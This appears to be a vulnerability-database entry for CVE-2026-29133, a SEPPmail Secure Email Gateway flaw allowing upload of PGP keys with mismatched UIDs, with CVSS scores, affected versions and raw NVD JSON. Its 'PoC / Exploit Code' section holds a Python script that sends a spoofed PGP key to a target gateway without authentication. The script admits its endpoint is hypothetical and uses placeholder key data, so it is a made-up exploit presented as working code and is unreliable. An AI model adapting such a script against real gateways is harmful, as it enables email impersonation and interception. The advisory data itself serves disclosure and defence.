Security Vulnerability Report
CVE-2026-29133 CVSS 9.1 CRITICAL

CVE-2026-29133

Published: 2026-04-02 09:16:21
Last Modified: 2026-04-16 19:06:52

Description

SEPPmail Secure Email Gateway before version 15.0.3 allows an attacker to upload PGP keys with UIDs that do not match their email address.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:seppmail:secure_email_gateway:*:*:*:*:*:*:*:* - VULNERABLE
SEPPmail Secure Email Gateway < 15.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL for key upload (hypothetical endpoint based on vulnerability description)
target_url = "https://target-seppmail-gateway/api/key/upload"

# Malicious PGP Public Key block with a spoofed UID ([email protected])
# The attacker holds the corresponding private key for this public key.
pgp_key_data = """-----BEGIN PGP PUBLIC KEY BLOCK-----

mQINBGI... (Base64 encoded key data) ...
=abcde
-----END PGP PUBLIC KEY BLOCK-----"""

headers = {
    "User-Agent": "Mozilla/5.0 (Compatible; CVE-2026-29133 PoC)",
    "Content-Type": "application/x-www-form-urlencoded"
}

# Payload containing the email address to spoof and the malicious key
payload = {
    "email": "[email protected]",
    "public_key": pgp_key_data
}

try:
    # Exploit: Send the upload request without authentication (PR:N)
    response = requests.post(target_url, data=payload, headers=headers, verify=False, timeout=10)

    if response.status_code == 200:
        print("[+] Exploit successful! Malicious PGP key uploaded for [email protected]")
        print("[+] Attacker can now decrypt emails or forge signatures.")
    else:
        print(f"[-] Upload failed. Status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[-] Error occurred: {e}")

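References

https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#seppmail-vulnerability-disclosure-1503 (Release Notes)
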
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29133", "sourceIdentifier": "[email protected]", "published": "2026-04-02T09:16:21.483", "lastModified": "2026-04-16T19:06:51.800", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SEPPmail Secure Email Gateway before version 15.0.3 allows an attacker to upload PGP keys with UIDs that do not match their email address."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": 
"Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:seppmail:secure_email_gateway:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.0.3", "matchCriteriaId": "E3729650-81CA-4311-94BF-14A7A191F8D1"}]}]}], "references": [{"url": "https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#seppmail-vulnerability-disclosure-1503", "source": "[email protected]", "tags": ["Release Notes"]}]}}